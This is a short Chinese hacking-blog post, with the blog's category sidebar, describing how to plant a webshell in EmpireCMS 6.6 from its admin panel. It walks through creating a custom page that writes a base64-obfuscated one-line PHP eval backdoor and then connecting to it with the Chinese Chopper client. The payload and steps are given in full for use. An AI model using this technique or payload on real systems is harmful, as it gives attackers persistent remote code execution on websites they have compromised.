帝国cms 6.6后台拿webshell方法

作者：qxz_xp 发布：2013-09-27 11:31 分类：菜鸟入门, 黑客技术, 黑客攻防 1条评论

进入后台后点击自定义页面-增加自定义页面-随便写了qxz.php文件名，页面内容填写，<script language=”php”>echo base64_decode(“PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=”);</script>

如果内容直接添一句话或者php大马是没有用的，，因为他会生成qxz.php前先给你执行！！

PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4= 就是 <?php @eval($_POST[‘cmd’]);?> 的base64加密。

所以生成qxz.php后会出现内容 <?php @eval($_POST[‘cmd’]);?> 在文件里，然后用菜刀直接连接就会看到你想要的结果了哈哈！

原创文章转载请注明：转载自七行者博客

电脑维修 (22)
- 其它技术 (8)
- 台式机维修 (5)
- 显示器维修 (3)
- 电脑软件 (3)
- 笔记本维修 (4)
网站运营 (65)
- seo优化 (45)
- 新闻资讯 (3)
- 网上创业 (8)
- 网站建设 (10)
- 网站推广 (7)
网络安全 (89)
- 入侵检测 (6)
- 安全知识 (27)
- 最新资讯 (21)
- 漏洞公布 (35)
- 病毒预警 (8)
腾讯QQ (81)
- QQ个性签名 (10)
- QQ个性网名 (18)
- QQ头像 (45)
- QQ技术 (6)
- QQ空间 (4)
黑客攻防 (486)
- 业界新闻 (178)
- 社工相关 (27)
- 菜鸟入门 (119)
- 黑客工具 (105)
- 黑客技术 (139)